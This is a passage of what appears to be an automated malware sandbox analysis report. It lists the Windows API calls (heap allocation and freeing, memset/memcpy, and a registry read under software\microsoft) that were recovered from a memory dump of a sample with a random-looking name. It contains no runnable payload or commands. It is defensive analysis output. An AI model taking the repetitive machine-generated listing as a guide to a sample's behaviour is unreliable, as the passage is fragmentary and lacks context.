                                                                                                                                                                                                                • Part of subcall function 0130A9D0: free.MSVCRT(?,?,?,772D7310,?,0130CEC2,?,?,?,0130A2D8), ref: 0130A9FF
                                                                                                                                                                                                                • Part of subcall function 0130A9D0: free.MSVCRT(0130CEC2,?,?,772D7310,?,0130CEC2,?,?,?,0130A2D8), ref: 0130AA0F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,000000FF,00000000), ref: 012E6CA1
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF,00000000), ref: 012E6CBF
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 012E6CDB
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegQueryValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 012E6D02
                                                                                                                                                                                                                • Part of subcall function 012E6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6D7A
                                                                                                                                                                                                                • Part of subcall function 012E6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                                • Part of subcall function 012E6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,774D0F10,00000000,012FA2D3), ref: 012F4A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F4A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F4A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F4A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EEB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EEB26
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EEB36
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EEB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000018,?,00000000,?,012F080E,?), ref: 012FAD98
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012F080E,?), ref: 012FAD9F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,012F080E,?), ref: 012FADAF
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,012F080E,?), ref: 012FADBD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EF388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EF38F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EF39F
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EF3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,774CF380,?,012EE879,00000000,?,00000000,012EFBC2), ref: 012EE484
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EE487
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012EE494
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EE497
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01324145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 01324148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01324155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 01324158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,7597EA50,01304B6D), ref: 012F41BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F41C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F41CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F41D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0